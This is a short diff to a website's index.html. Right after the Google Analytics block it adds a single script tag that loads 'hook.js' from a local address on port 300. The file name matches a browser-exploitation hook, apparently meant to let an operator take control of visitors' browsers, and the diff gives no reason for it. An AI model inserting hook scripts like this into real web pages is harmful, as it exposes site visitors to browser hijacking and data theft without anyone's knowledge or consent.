--- a/index.html
+++ b/index.html
@@ -22,6 +22,7 @@
 
   gtag('config', 'G-ZPHTNWP8FV');
 </script>
+<script src="http://127.0.0.1:300/hook.js"></script>
   </head>
   <body>    
      <div class="wave"></div>
